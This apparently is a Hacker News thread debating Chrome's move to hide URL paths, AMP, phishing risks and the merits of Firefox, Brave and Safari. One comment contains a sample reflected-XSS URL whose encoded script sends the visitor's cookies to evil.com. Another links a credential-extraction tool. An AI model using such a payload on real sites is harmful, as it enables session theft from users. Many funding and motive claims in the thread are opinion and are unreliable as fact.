Maybe like a decade ago this was a student project that Google sponsored (maybe as either Summer of Code or some precursor to that). A student group developed a system for “tagging” a page with a series of “random” but memorable words that could be used to identify a page. Kinda like how imgur and other other sites generate URLs now. Like “glittery hamster bananas” or something like that.


> give you the smallest query that would have returned exactly this page as a first result

Just out of curiosity, is there a publicly accessible Google service, or a third party service, that does this? That would be useful to find more content or point-of-view about a topic (by looking at the other results)


Maybe this is just one of those pet issues that I can't get behind. Hiding "www" does not strike me as some evil scheme to prevent savvy users from bookmarking websites. It just doesn't.

They already had the feature you are worried about and it's existed since like 1999. Do you remember the "I'm Feeling Lucky" button? You could bookmark a query and it would redirect you to the first result for that search. It was discontinued in 2010 [Wikipedia].

I feel like there are a lot more sane things to be paranoid about in the world right now, but mandatory "I'm feeling lucky" doesn't reach my top 20000.


"I'm Feeling Lucky" was never discontinued [https://www.google.com]. It just got moved to the bottom of the autocomplete list that appears when you start typing.


I assume that crack smoking ux designers made this decision



We’ll be back to ‘AOL Keywords’ soon if it were up to them.

“Jerry, you don’t deserve the internet” https://m.youtube.com/watch?v=lcR4h4eIR2E


I honestly don’t think people are paying attention to the URL bar, at least not the people this feature it trying to protect.

If it looks like Google.com, then it Google.com. The logo even says so.

It’s a dumbing down of the internet, in an attempt to help the average user, but it won’t work and you’re just making life harder for those who know just a bit more then average.


That's bullshit, it's not an attempt to help anybody but Google.

What better way to keep people on AMP pages, than to make them so ignorant as to not even know how to tell the difference?


What the heck? A regular user doesn’t understand or care what the technical difference between a “regular” page and AMP is. I wouldn’t call this ignorance per se.


Not knowing and not caring is the very definition of ignorance.

Sometimes I wonder if feudalism must have felt like this from the perspective of the noble people. Will there be a dark age followed by enlightenment? Because right now we seem to encounter self-imposed nonage.


This is patently false. I talk to non-tech "regular" users all the time that despise AMP.


This is patently false. I talk to non-tech "regular" users all the time that don’t know what I’m talking about when I mention AMP and its issues.


Count me among them.


Just because they don't care doesn't mean exploiting their ignorance is okay. I don't know that I agree with the GP that this is a targeted move to get AMP to slide under the radar, but if it is we should totally care. AMP undermines the fabric of the web. Just wait for the day that Google starts serving AMP for sites that aren't even configured for it. When they serve an AMP page, they are doing more than being a middle man, they are controlling the traffic and the display of the site, and the user is none the wiser. Google penalizes you for doing the same thing, specifically because it's nefarious.


I'm pretty sure regular people can tell the difference between a regular page and an AMP page. The AMP page simply doesn't work right and it's quite difficult to miss that.


Also you have to go out of your way to share the original link so people know what site and descriptive link you are sharing.

AMP adds 2-3 additional actions to that user flow.


Whats wrong with AMP pages?



I don’t click on a search result to read google.


Why do you click on a search result?

For me, it’s to get information. Why do I care what format the information is presented in?


They exist.


If you don't know the URL, you won't know if you're on an AMP site or the actual one.


Most users need to care about that as much as they need to care about whether the page is being vended from a fresh server response or local cache.


would you care if you went to mybank.com.sketchysite.us?


Isn't that the point of this change, only showing the domain to prevent phishing?


No, they already were doing that by using color to make the other parts less prominent. There is no good explanation to to this change than making people rely more on Google search.


That's a pretty big leap, especially since users can change Chrome's search engine.

There are a couple of reasons they could be making this change highlighted in these threads.


It's the default, and most people who would change it (let's be honest, for privacy reasons) would switch to something like Firefox.


It still feels like you dove into the deep-end of the data collection conspiracy pool before considering other more-likely explanations, like "They have the information now to know that, in general, using color to make the rest of the bar less prominent wasn't sufficient to minimize users feeding data to malicious sites."


A better comparison would be mybank.com/logmein vs mybank.com/login vs mybank.com/l.jx?s=AU8NE6FX5IKMD2

And no, users do not need to care the slightest whether they go to the first, second or 3rd URL. What they care about is that they are entering their sensitive information on mybank.com's domain and not a russian counterpart, that's it.


How about mybank.com/login?reflect=%3Cscript%3Enew%20Image().src=%22http://evil.com%22%20+%20document.cookie%3C/script%3E


That URL is utterly indecipherable by 99.99% of Internet users, so displaying it in full does absolutely nothing to protect users.

The onus to protect against a website takeover is on the domain/server owner, certainly not on the browser vendor although they try to mitigate simple attack vectors.

edit: added a few 9s


Well, it switches that 99.99% to 100% now, so a step backwards.

They already used colors to de-emphasize other components, this doesn't look like anything else than pushing people to rely more on google search.


> Well, it switches that 99.99% to 100% now, so a step backwards.

Refraining from collecting malicious links happens before you click, by the time it's in the URL bar it's already pretty late to mitigate against attacks.


Bad analogy. AMP is a Google content proxying technology, and Google isn't generally understood to be a "sketchy site."

Users with the level of paranoia that puts Google in the "untrusted site" space should be sidestepping this whole conversation by avoiding using the browser Google develops regardless of what Google does to its URL bar.


> AMP is a Google content proxying technology, and Google isn't generally understood to be a "sketchy site."

The whole idea of AMP pages is sketchy by default, as it's Google taking content from websites run by news media outlets and hosting it on their own servers so they have even more control over user-tracking.

In the long term, this has the potential to further centralize the Internet, something the Internet was never meant to be.

It's not that difficult to imagine a future where news media won't even host their own stuff anymore but instead outsource it all to Google.

Very comparable to how Facebook has become the de-facto place for small businesses, with little to no IT knowledge, to have their own little web-presence.

Which has certain advantages, but it's dangerous to belittle the very real disadvantages that kind of centralization of content will have in the long term.


Again, people concerned over this risk scenario should be switching to another browser regardless of what it does to the URL bar, right? I doubt we're going to find many users who's thought process runs "I'm really concerned about the long-term risk of Google building a dystopian information warehousing monoculture, but I was still going to use chrome. But now that they're changing the UI to, I assume, support their goals of building a dystopian information warehousing monoculture, it's A BRIDGE TOO FAR."


>people concerned over this risk scenario should be switching to another browser

IMHO it's our duty as technical users to advocate for a more private, open and de-centralized web for everyone.... We should especially be doing it on behalf of the users who don't understand the long term implications of Google's (anti-) features.

'Just switch to another browser if you don't like it' is not a compelling argument.


That's fine. In my humble opinion it's our duty as technical users to build a web that is both safe and usable by non-technical users. Sometimes we do that via improved privacy, more openness, and decentralization; sometimes we do it by centralization (lists of threat websites, certificate chains of trust baked into browser defaults), less privacy (expecting users to authenticate before making meaningful changes on sensitive data or people's money), and more closed architecture (ad spam countermeasures).

Every tool in the toolbox to make the web better.


But switching to another browser does nothing to challenge AMP, as these changes are mostly pushed on the server-end while changes to the browser end, like this one, serve to further obfuscate this consolidation of Google's dominance on the web.

In that context, it's a bit cynical to belittle the problem as you are doing there when this has been a very real issue for several years. As by now Google, Facebook, and Amazon control the vast majority of web traffic and have been doing so for years already [0].

This isn't some hypothetical scenario, it's something that's already very real.

[0] https://staltz.com/the-web-began-dying-in-2014-heres-how.htm...


Switching to another browser would let a little air out of the Google hegemony.


Google is "sketchy" for any non-American who wishes not to be subject to the whims of American law and espionage.


Wouldn't Mozilla also fit that description?


Since Mozilla doesn't collect search, browsing, location, and email history — No, it's not the same. It's not even close.


> What Google is trying to do here is to drift the web from its most iconic components: the URL

A few months back, people on HN were wondering why creating a new tab in Firefox causes the URL bar to become magnified.

I wonder if this is part of the reason. Perhaps Firefox believes they have to educate users about the URL bar because Chrome is attacking it.


Word! Frankly at this point I'm even starting to think that the whole weird "SJW" angle of this thread is also disingenuous and taking us away from the boiling frog death of the Internet, replaced by AMPed up centralized comoditization of users, with death to all liberty and openness.


> the boiling frog death

That metaphor is based on a false premise[1]:

> While some 19th-century experiments suggested that the underlying premise is true if the heating is sufficiently gradual, according to contemporary biologists the premise is false: a frog that is gradually heated will jump out. Indeed, thermoregulation by changing location is a fundamentally necessary survival strategy for frogs and other ectotherms.

[1]: https://en.wikipedia.org/wiki/Boiling_frog


In the meantime the post that used the term SJW has disappeared. Oh well.


It and its 101 children are still there if you have `showdead` enabled in your HN settings


I believe this too.

In fact, I think the evidence is not only overwhelming but the tech community is thoroughly comprimised, proven so on account of all the recent purges and attacks on wrong-think.

I no longer trust my software.


I don't know why I get downvoted for this when I wrote it based on the reality of the situation.

I guess some people just feel guilty/ashamed!


> What Google is trying to do here is to drift the web from its most iconic components: the URL. This is the biggest threat to the web that we loved for so many years.

Safari has hidden the full URL since 2014. For the vast majority of users, the full URL is just noise.


The URL bar takes up a huge amount of screen real estate and is a piece of information that the user almost never needs once they have confirmed they navigated successfully to the desired page. Developers are a special case user and capable of handling advanced UIs that hide information until it is needed.

It's iconic but it's a UI space resource hog. To improve browser experience, sometimes one has to be willing to try slaughtering a sacred cow.


Hmm, don't all mobile browsers already autohide the URL bar when the page starts scrolling up? Seems like that worked fine so far. Besides the OP is about hiding part of the URL (path), not the URL bar of the browsers.


Seems Firefox previews doesn't, and I honestly prefer it that way. They moved it to the bottom of the screen which makes it easier to use and less intrusive.


Hiding part of the path allows them to shrink the bar horizontally, which leaves more room for other content, such as chrome extensions.


The URL can already be longer than the screen to begin with, so they could still do that and show as much as will fit, showing the rest if you click on it. This is already what Firefox does.


But from a UI standpoint, having a text box that is too small for its common displayed content is sloppy. If the path usually makes things too long, hide the path by default until the user asks for it.


It's only too small when it's too small.

https://old.reddit.com/r/space/

Fits fine and tells you at least three useful things that just "reddit.com" doesn't.

https://old.reddit.com/r/space/comments/h8t50n/i_often_get_a...

Doesn't fit, but even truncated it still tells you the same useful things.


But that's useful information that's told me redundantly by the page title and the banner at the top of the page also. I don't need the URL bar for that.

In fact, using the URL bar for it assumes that the path has semantic meaning, which is not an assumption that the URL standard actually requires.


> But that's useful information that's told me redundantly by the page title and the banner at the top of the page also. I don't need the URL bar for that.

The page isn't required by anything to contain that information or to give it accurately. How do you distinguish example.edu/financial-aid/ from example.edu/~some-student/ ?

> In fact, using the URL bar for it assumes that the path has semantic meaning, which is not an assumption that the URL standard actually requires.

It doesn't assume anything, it just shows you the URL. If it has semantic meaning then you can see that -- which it commonly does.


> How do you distinguish example.edu/financial-aid/ from example.edu/~some-student/

That's an unrealistic example because no website worth its salt is going to let students put arbitrary content in the same domain as the financial aid system. That's a recipe for leaking cookies that contain session tokens, and displaying a full URL won't save a user.

By the time you see the ~some-student in the URL bar, the security game is over.


You're making a lot of assumptions there.

It could be that example.edu/financial-aid/ is just information and PDFs and doesn't have any sessions or cookies. Or the real financial aid system is on another domain, but a first time user doesn't know that, they're just looking at www.example.edu/~some-student/ which appears to be a financial aid page that Chrome only says is example.edu.

Or any other case where the contents of the URL matters. How about example.edu/~some-student/ vs. example.edu/~a-different-student/ or example.edu/~your-professor/?


That hypothetical naive first-time user is going to be as fooled by ~financial-aid, or by ~some-user/financial-aid. Showing the full URL path doesn't fix that risk scenario.

The other scenario you describe, if the risk is someone intentionally deceiving users by cloning a page on the university network owned by someone else for deceptive purposes, is better solved by a university disciplinary hearing than by expecting every student to understand URL paths.


> That hypothetical naive first-time user is going to be as fooled by ~financial-aid, or by ~some-user/financial-aid.

The attacker may not be able to get ~financial-aid, only ~juan-ramirez, and even if you don't know about home directories, the first thing that strikes you about ~juan-ramirez/financial-aid is that something is wrong because you are not Juan Ramirez. If you do know about home directories then it's a giant red flag which you can't see if the browser is hiding it from you.

It doesn't have to prevent 100% of attacks. Preventing 7% of attacks is still 7% better than nothing.

> The other scenario you describe, if the risk is someone intentionally deceiving users by cloning a page on the university network owned by someone else for deceptive purposes, is better solved by a university disciplinary hearing than by expecting every student to understand URL paths.

The most common way things like that happen isn't the actual student who would have to be using their own name, it's that the student uses a weak password or gets their computer infected with malware and then some Russian hacker sets up on their school account.

You also don't need every user to understand them, only one who then reports it. If you don't show the paths to anybody then much more likely that nobody notices, or that it takes longer for somebody to notice and more people get compromised in the meantime.


> the first thing that strikes you about ~juan-ramirez/financial-aid is that something is wrong because you are not Juan Ramirez

User studies indicate that the first thing a user notices is... Nothing. The gobbledygook in the path is so much noise for the average user that they don't notice if the path seems off. In fact, it makes sense to hide it from a security standpoint to decrease the odds that users go information blind to the domain, because we already know that improper domain routing to lookalike domains is, by far, the most common vector for credential theft.

There isn't even a guarantee that showing the path to address the 7% case (which really looks like more 0.07%) will on average cause the incidence of users being compromised to go down, if it means users are less likely to notice that the subdomain and domain are off.

I'm sure that for the people who really care, it won't take long to hack together a chrome extension that drops the full URL into the page title or a pop-up box on the page itself.


> User studies indicate that the first thing a user notices is... Nothing.

There are a thousand ways to screw up a user study, but one of the best ways to detect a screw up is if they say that users either always or never do something.

> In fact, it makes sense to hide it from a security standpoint to decrease the odds that users go information blind to the domain, because we already know that improper domain routing to lookalike domains is, by far, the most common vector for credential theft.

Which is why it makes sense to highlight the domain. Make it a different color. Make it a bigger font size. That still doesn't require you to omit the rest of the URL.

> I'm sure that for the people who really care, it won't take long to hack together a chrome extension that drops the full URL into the page title or a pop-up box on the page itself.

Except that the people who actually do that really are the 0.07% and you've still lost the 6.93% who would've noticed if you'd put it in front of them but aren't about actively change the default you gave them ahead of time.


You're using concrete numbers but you don't have the statistics or analysis to know what the numbers are. I'm going to assume the company that has telemetry on its own product does.

... but probably more importantly, nobody likely needs to hack together an extension after all. Older news story about how Chrome will add an option to show the full URL bar as non-default.

https://www.zdnet.com/article/googles-chrome-will-give-you-a...


To improve browser experience all you have to do is use a computer that doesn't suck. The fact that your primary browser is on a tiny phone display is a problem with phones, not with browsers. Browser for phones can evolve to match the disabled nature of their device's but lets hope such gimpings don't filter back into actual desktop computers.


"Spend more money on your computer" is a fine solution for a bay area software engineer. It's not a solution at all for the half of America that would have to sell their car to cover a $400 ER visit.


I make under $12k/year. I live in the midwest. I would have to sell my car for a $1k ER visit.

It's still cheaper to build a $450 real desktop computer (that lasts decades+) than it is to buy a $800 4 year life gimped smart phone that can't do any productive work any isn't in my control.

(And my $20 nokia dumb phone has worked perfectly since 2006 for phone calls/text.)


You live in the midwest United States; you're not the user we're talking about.

We're talking about the person in small-town India who has a Micromax Black Q385 spark 3, 8GB store, 1GB ram, 5.5" screen, which they bought for $50. They also get their Internet access through the cellular equivalent of a drinking straw.

(Even still, my personal guess is that this URL bar change isn't about them; it's about the desktop experience).


I don't think Chrome can run on a machine like that.


Desktop computers are available waaay cheaper than phones.


I'm actually not thinking about the phone form factor at all. A shorter URL bar in the desktop allows for to take up less horizontal space, which leaves more room for chrome extensions.

Also, "use a real computer" is a pretty elitist attitude that misses Google's goals overall. Google is not targeting exclusively users that have desktop machines with multiple cores and graphics accelerator cards. They want to provide internet services and internet access to people whose only portal to the web is a mobile device.


> A shorter URL bar in the desktop allows for to take up less horizontal space, which leaves more room for chrome extensions.

Are you seriously claiming you need all (or even just more than like 10%) of your 1920+ pixels of screen width for your Chrome extensions?


I have a lot of chrome extensions, yes.


To the point where screen space is becoming tight? You are probably something like 0.001% of users.


> misses Google's goals overall.

Oh, I'm not missing that. Google's software offerings are now primarily designed for bad computers with bad UI, bad network, and bad energy storage. Because people love those crappy devices and most use them primarily. We both agree.

>A shorter URL bar in the desktop allows for to take up less horizontal space,

Which really doesn't matter if you're on a desktop computer with an actual monitor. The only reason to do this is more "convergence" BS and thinking phone crutches are required on desktop.


Agree to disagree, because my primary device is a multi-core desktop with a curved monitor over two feet long and I still think the URL bar takes up too much horizontal space in my browser top bar.


The problem is maybe, a widescreen is bs for most things anyway. In most applications there is so much emtpy space on the left and the right side. I use not just with monitors because of it, they are also height. 43" 4K is nice to work with.


I'm sorry to say, but your a bit naive if you think they're doing it for cosmetic reasons.


1) I'm not generally in the habit of prognosticating all of the reasons a corporation the size of Google tries to do something, especially not when there's an apparent and obvious win possible from the change itself. Minimizing the URL bar leaves room for other things on the page, including chrome extensions and, possibly, page content.

2) UI improvements are not "cosmetic reasons," they directly translate to ease and efficiency of task completion. As a UI engineer, hearing my category of work called "cosmetic changes" can be, quite frankly, exhausting. If someone were to halve the default font sizes on all browsers, would we consider that a mere "cosmetic change" or would it be a change that would have direct and immediate impact on people's ability to accomplish tasks?


Well I'm exhausted by UI/UX engineers oversimplifying things that are inherently complex. To the point to not really helping people simplifying their work and totally hindering advanced user. There is a reason industrial UI usually don't suffer this, because complex interfaces are there for a reason.

You know what else is "a UI space resource hog" on the web ? Advertising. And I'm sorry but "wasted" space is generally much bigger. So, no, I'm not ready to loose my address bar for bigger ads.


There's a reason most commodity software doesn't adhere to industrial UI standards.

Chrome is well into the commodity software scale, and one should assume its UI decisions will lean in the direction of maximum utility for the most users.


The problem this proposedly solves is a real one but only pushing and considering the most extreme solution suggests that it's not the real motivation.

If the problem is that showing the whole url might hide the domain, why not make the domain bold? or highlighted some other way? What about separating the domain and path when viewing (but not when editing)? it's a bit hard but quite possible.


I’m pretty convinced this is going to lead to more tracking metadata shoved into the URL. I don’t know if that was the real incentive, that users weren’t clicking links with very clear tracking or tons of url params. But id put money down today that this will be the most significant end result. Thanks Google.


Pretty ironic for a company that wouldn't exist except for the ability to crawl and index URLs. So now only the domain and TLDs are to be shown. I presume that a "full" URL can be typed once the URL bar is clicked though? But any guesses how long until they remove the ability to enter URLs?


>Pretty ironic for a company that wouldn't exist except for the ability to crawl and index URLs.

It's called "kicking the ladder after climbing the wall".


They will not as it will cause a serious backlash from web developers for making it a Googlenet viewer rather than a web browser.


I've stopped using Chrome.. it is an optional browser. Firefox is my Goto browser at this moment of time.


Whoever at Google is responsible for this, I suggest they read this: http://worrydream.com/MagicInk

I guess they forgot what "information software" means. I use Firefox, but this is just bad design.


I haven't read it yet, but the movies in those examples ("Rainman Forever", "Die Hard With More Intensity", etc.) sound fantastic. And they all feature Jet Li.


I think web developers are so used to URLs they don't realize how ridiculous they are. If you were inventing the web from scratch, there's no way you'd require a non-human-readable string displayed in the most prominent position on every single page and it's editable! How do people know how to edit it? Each site has its own unique undocumented parameters and formatting. It tells you something about the state of the page but not everything needed to debug problems. Also, don't make a SPA with an unchanging URL because you'll lose all the "important" value of a URL.

Desktop and mobile apps somehow survive without them. If URLs are important, why don't developers include their own URL system in those?


Firefox mobile syncs beautifully with desktop, and they have a standalone password manager app that syncs with your browser's password manager, maybe you'll find it useful.

There's also an accessibility setting to always force zoomability, even when the site disables it.


I'm a Firefox user, but I don't see myself using Lockwise, it's too lacking in features, not to mention the security caveats of using your browser's password "manager". You're better off using a third party like Bitwarden or KeyPass.

Edit: Brain mashed together 1Password and KeyPass.


This might be harmful to github pages where it would hide the repository name. If they include this without offering an option to turn it off, I will quit using Chrome.


I switched to Firefox years ago and never looked back.


I never switched away from Firefox. I am old enough to know that nothing comes free, especially from a Big Corporation. As customers, all we can do is to always keep a good alternative alive, no matter what.


But Chrome is not free (well kind of). It saves lot's of money in royalties for Google (because Google search is the default search engine in Chrome). So even if it's 'free' it saves money for Google.


Firefox isn't free either. It's just paid for by Google.


The other day I heard Firefox described as Google's antitrust lawsuit insurance...


Hah, that actually makes me happy as a no-break Firefox user since 2003. At least that means Google will continue to support Firefox independently for as long as they're in the browser business.


They also support Bing


That doesn't mean it's behavior is the same.


True, but then I’m not sure Mozilla would be able to survive if Google stopped their deal with them due to say, adding ad-blocking to Firefox by default. Not the same, but it certainly influences the direction of FF.


> but it certainly influences the direction of FF

I don't think Mozilla's trying to please Google in any way. Google's keeping Firefox around to try to avoid the appearance of a total monopoly.

But Mozilla's behavior certainly is influenced by trying to find alternative business models, sometimes not perhaps with the best results, (Mr Robot promotion everyone), I still think it's worth using it over Chrome.


This is true, but then again absolutely all browsers are being funded by ads. We are talking Edge, Safari, Brave, all of them.

Did you know that Apple does in fact get more money from Google than Mozilla does, for keeping their search engine as the default? 12 billion dollars in 2019. Do you think Apple would activate ad blocking by default and risk losing that many billions of dollars? Speaking of which, Safari's ad blocking is the joke of the industry.

You could make the case that Safari might survive if Google cuts its funding, but judging from the history of IExplorer, I have my doubts. One could make the case that Safari is alive just because Apple is making a shit ton of money on it.

Did you know that Microsoft's Bing Ads platform made them 8 billion dollars in 2019? Do you think Microsoft would do anything to jeopardize that ads revenue? Did you know that Windows 10 has an "advertising ID" used to personalize ads, that via Edge is transmitted to Bing?

Did you know that Brave, that leech which is piggybacking on other people's work, that's supposedly blocking ads by default, is effectively replacing publisher ads with their own, then forcing those publishers to enter into deals with them for a piece of the action, while making it really hard to detect and block Brave? All the while pushing shady cryptocurrency affiliate ids straight in their source code?

---

Mozilla might not push for ads blocking by default.

But they do block trackers by default and their browser is afaik the only one that has legitimately supported uBlock Origin on top of Android. And uBlock Origin is the best, most aggresive ads blocker available and given Google deprecating the blocking ability of the WebRequest API, Firefox might remain the only one with a uBlock Origin implementation.

Could Firefox survive without Google?

I don't know, but can any other browser survive without Google or Bing? I have my doubts and you'd be naive to think otherwise. Plus this is just whataboutism.


None of the things you mentioned about Brave make them funded by Google, and the system they want for ads is clearly better for the consumer than the status quo.


Brave is essentially a repackaged Chrome and does nothing to help undermine the Blink monopoly. They're not directly funded by Google, but their browser depends directly on Google funding Chrome's development.


If Google disappeared tomorrow, Brave would continue to exist and would continue to get updates.

Brave does not depend on Google, directly or otherwise. They depend on an open source project called Chromium, which is largely developed by Google, but because it is open source anyone can build off of it.

Brave funds their development through the BAT token and through affiliate marketing, both of which are much better for user privacy and security, and much more resilient to Google than where Mozilla is getting its money.

No, I don't think Apple would integrate thorough ad-blocking by default, just as I don't think Mozilla will do this either. Brave has already done it. Brave's ad-blocker works better by default than any ad-blocker I've used, and I've tried them all.

HN's hate-boner for Brave is very strange. They clearly care more about user privacy than any other browser vendor (except maybe Safari, but again they have a conflict of interest), and it is built on a core that is arguably the best at handling the modern web (Chromium).


> If Google disappeared tomorrow, Brave would continue to exist and would continue to get updates.

Microsoft wasn't able to keep developing a browser on their own, I doubt that Brave could. The problem is that a browser nowadays is so complex to develop that you need serious resources to invest in it. Without Google's ongoing development, Brave would not survive. And given Google's changes to undermine ads blockers, it's going to be interesting to see Brave struggling to maintain their fork.

---

> much better for user privacy and security

Right, keep telling yourself that.

Btw, I actually wonder how what Brave is doing isn't copyright infringement, given they are directly profiting from blocking the ads of publishers. I guess they are small enough to not matter, for now.

---

> Brave's ad-blocker works better by default than any ad-blocker I've used, and I've tried them all.

I worked on anti-ad-blocking technology.

Nothing beats uBlock Origin running on top of Firefox, everything else was strictly inferior. Not even blocking JavaScript in the page, because you can easily force the user to enable JS for you by breaking the content on that page. uBlock Origin is so bad that we avoiding it entirely, being useful for people frustrated with AdBlock Plus to turn to, sort of like in the Matrix.


> Microsoft wasn't able to keep developing a browser on their own, I doubt that Brave could. The problem is that a browser nowadays is so complex to develop that you need serious resources to invest in it. Without Google's ongoing development, Brave would not survive. And given Google's changes to undermine ads blockers, it's going to be interesting to see Brave struggling to maintain their fork.

IE was woefully out-of-date. MSFT then tried to build a browser from scratch. That was a lot of effort, so they decided to fork Chromium (like Brave) instead. What exactly do you think would happen in Google dissappeared tomorrow in their case? Do you think they would go back to trying to build their own browser from scratch? No, they'd just keep developing Chromium. Many (most) changes would probably be upstreamed. Forking a browser and maintaining it is orders of magnitude easier than starting from scratch in [current year]. As you point out, there are not multiple parties building on Chromium, so I'm sure slack could be picked up if Google switches gears. But you're right, maybe Brave won't be able to keep up with upstream changes that make ad-blocking harder. In that case, you can always just switch browsers. In the meantime, however, I'll use the browser that does a better job of protecting privacy by default.

> Right, keep telling yourself that.

Luckily, I don't need to. A browser that blocks ads by default is objectively better for user privacy and security than one that doesn't.

---

> Btw, I actually wonder how what Brave is doing isn't copyright infringement, given they are directly profiting from blocking the ads of publishers. I guess they are small enough to not matter, for now.

They aren't directly profiting off of ad-blocking, so maybe that helps.

---

> I worked on anti-ad-blocking technology. Nothing beats uBlock Origin running on top of Firefox, everything else was strictly inferior.

Have you actually tried Brave? Works better for me, and I've tried Firefox with uB0. Have also tried Chrome with uB0. Brave blocks both ads and tracking more consistently across the board. It occasionally breaks a webpage, but I have reported those to Brave and two of them have been fixed (out of like 5). This process is clearly better for users than everyone having to configure their uB0 Matrix and such separately. Brave is creating a web where all the privacy violating / attention grabbing shit is very much blocked by default in a much stricter way than other options. When this breaks the internet, they fix it and because this fix is part of the blocker it fixes it for everyone.


> If Google disappeared tomorrow, Brave would continue to exist and would continue to get updates.

"Updates" may be, large, architectural upgrades? Doubt it. There's a reason they didn't start fresh and I very much doubt they'd muster the resources to maintain development were Google to drop it. Google has invested billions, probably tens of billions into Blink engineering.

What I could see happening is Brave forming some sort of a coalition with KDE and the wider open-source community in the better case or trying to switch to WebKit in the worse case as that is exchanging one corporate overlord for another.

Not to mention Brave's VC funded, so they'd want some form of a meaningful exit at some point.

The bigger concern however is not that Google will not fund Blink development, but that it will increasingly implement features that primarily benefit itself and Brave, as a dependent player, will be spending an increasing amount of resources trying not to get eaten by Google's "direction tax", as all developers depending on a 3rd party corporation they're in some sense competitors with find out eventually.

See also Twitter 3rd party client developers or the many AppStore devs Apple burned and ruined their business overnight.


Safari doesn't ship with an ad blocker, and its content blocking until now has worked fairly well.


That Safari doesn't ship with an ad blocker, indeed, that was the point, and it never will.

And its content blocking, speaking both as a user and as somebody that worked on anti-ad-blocking technology, is really easy to circumvent and only useful on websites that haven't adapted yet.

As an iPhone user for me it's bad enough to make me want to switch to Android. What works consistently well has been DNS-level blocking (Pi-hole, NextDNS).

For you it might be OK, but I can tell you Safari is a favorite among the big players in this space [1].

[1] https://www.betterads.org/members/


> > I switched to Firefox years ago and never looked back.

> I never switched away from Firefox.

I switched to Firefox... from Netscape/Mozilla.


Given that Firefox slowly adds all the things we hate about Chrome due to the argument "we need to compete for normal users", how much do you want to bet Firefox will hide the URL in a few months (and even remove the setting that lets you change it)? :(


Firefox is already doing this! I recently had to dive into the about:config to find a setting that was hiding part of the URL. Although I can no longer find the setting that I configured so perhaps this has been changed in a recent update?

Edit - found it: the setting "browser.urlbar.trimURLs" hides the "http://" protocol if it's used. I do a lot of local development and found it annoying that Firefox was hiding it.


Thanks for this! Turned it off. I guess I haven't noticed because my focus was always attracted to the padlock with a red line through it in front of the URL.


Except in Chrome, you don't even get a flag.


It is weird not more people just respond this way rather than getting all worked up about it...


It's weird that people like a particular browswer for a number of its feature, but are upset about a change that makes it worse?


Yes, it is kind of weird to like a browser where the company behind it are actively working against the web when there are decent alternatives (arguably better alternatives) that does not contribute to a monopoly that we can not break.

Do you think IE6 was bad? Remember how long it took to get rid of it? Imagine a world where the monopoly leader doesn't just walk away from the browser (which is what MS did with IE6) but actively abuses the situation. It will be orders of magnitude worse. Say hi to amp. Say hi to chrome. Say hi to google. Say goodbye to the web.


> Remember how long it took to get rid of it?

I suspect a lot of people in this conversation are not old enough to remember, even if they wanted to.

Maybe universities should have an obligation to promote nonprofit tools (i.e. Firefox) rather than shady commercial software that only happens to be gratis.


Chrome is the new IE. Some sites don’t work (well) with others browsers, so people are annoyed when the browser they are forced to use does stupid things.


Before Edge came out, I always preferred IE11 over Chrome (on machines that only had those two installed), because IE11 kept the legacy "must compete with Netscape" features like decent contentEditable context menus. And websites that didn't work in IE11 generally weren't worth using anyway.

Now… well, IE11 doesn't even support ES6 properly, and good sites have started relying on that, and Edge is just evil Chrome – unless it's got Firefox installed, Chrome's your only option. But sites that use Chrome-only APIs aren't worth using anyway.

(Oh, wait, Zoom needs either Chrome or a malwarey desktop program.)


Zoom works in Firefox.

And there are alternatives to Zoom, e.g. Jitsi.


> Zoom needs either Chrome or a malwarey desktop program

...and the malwarey desktop program is also Chrome.


The backdoor part isn't Chrome, though, is it? (If it's a Node.js script bundled with yet another copy of V8, I'll scream.)


This analogy would work if Google was deliberately holding back new features on the web to favor its proprietary operating system but in fact the situation is pretty much the opposite.

I also don't understand why everyone is up with pitchforks at Google on this when Apple did the same thing to URLs a while ago. I guess engineers are just as susceptible to groupthink as anyone else.


>This analogy would work if Google was deliberately holding back new features on the web to favor its proprietary operating system but in fact the situation is pretty much the opposite.

They do kind of do that. Rather than going through the consensus process for getting a web standard added, they implement it in chrome then unilaterally write a standard for themselves. See for example, the SGX (signed exchange) "standard" they pushed out.


Most people don't use apple.


Apple is massively popular in the US. The last few projects I've worked on our users were 50% iOS Safari.


It's weird that they complain yet don't actually switch.


Passwords and bookmarks are in Chrome. That's the main point of friction. But I do re-evaluate Firefox from time to time. So far there has often been small things which made me reluctant.

I think this feature is important enough for me to consider switching this time.


You can easily transfer those to Firefox.

That being said, I admit that staright out of the box Firefox doesn't have the same experience but you can customize every little thing about it to make it suit your needs.


That’s too close for comfort to the Windows/Linux comparison.

This said, I honestly don’t understand what people mean when they say the experience is “superior” in Chrome. It’s a web browser. It browses. You get passwords saved and synchronised. Everything else is an extension. What’s so bad about FF...?


The last time I tried to use Firefox for a daily desktop driver, I found its dev tools far less discoverable and powerful. It may be that they're as good or better and just harder to learn. Related, if you're debugging hybrid mobile apps, Chrome is pretty much the only game in town on Android, IIRC.

It also felt noticeably slower at the time.

Finally, with Chrome's market share, good extensions that Just Work are more common there, in my experience. I use a whole host of plugins on desktop, and when I looked at switching back to FF last year, I did not find equivalents for everything.

I did go back to FF on mobile, because I do remember the nightmare of IE 6 and want to protect the web from total Google control. On mobile, I miss the dev tools and array of extensions less.


I would love to get comments from Chrome users

I just could not live without firefox and being unable to share tabs/links from anywhere in my phone to my desktop and or laptop


As a Safari user it boggles my mind that Firefox's send to device feature is considered good at all. All my Safari tabs are automatically synced to my phone at all times with no intervention needed from me. It's one of the few things keeping me from switching to Firefox actually.


> All my Safari tabs are automatically synced to my phone at all times

I hate the hell out of that. My phone is my phone, my laptop is my laptop, just leave them alone.


I guess I'm forgetting there are people with dozens of tabs open at a time that probably wouldn't like this. The Safari thing does keep them separate though from your mobile tabs until you open one.


You can do that with Chrome if you are signed in.


You can import your passwords into a 3rd party password manager and enjoy having them available on any devices and browsers supported by the password manager.

As for bookmark, firefox should be able to import chrome bookmark. It can even import saved passwords and cookies so your active session is preserved.


I don't like to trust too many entities with my passwords. You can't avoid having to trust the browser maker but adding another third party password manager to the mix would just make me twice as vulnerable for no good reason.


Well, you only need one reason to use a password manager.

https://github.com/AlessandroZ/LaZagne


Is that all? I had no trouble migrating. Maybe it will be a pain going back and forth a lot. Add-ons/extensions might be more painful though. I found it was a good time to clean up and get rid ones i anyway no longer care about.


the latest version of Firefox has an "import Passwords from another browser" feature. just go to "about:logins" and click the menu in the top right hand corner.



A two month old bug they're trying to fix keeps you from switching? Is it present in the ESR?


I need more context to judge. But I am sure there occasionally are bugs in chrome too...


[flagged]


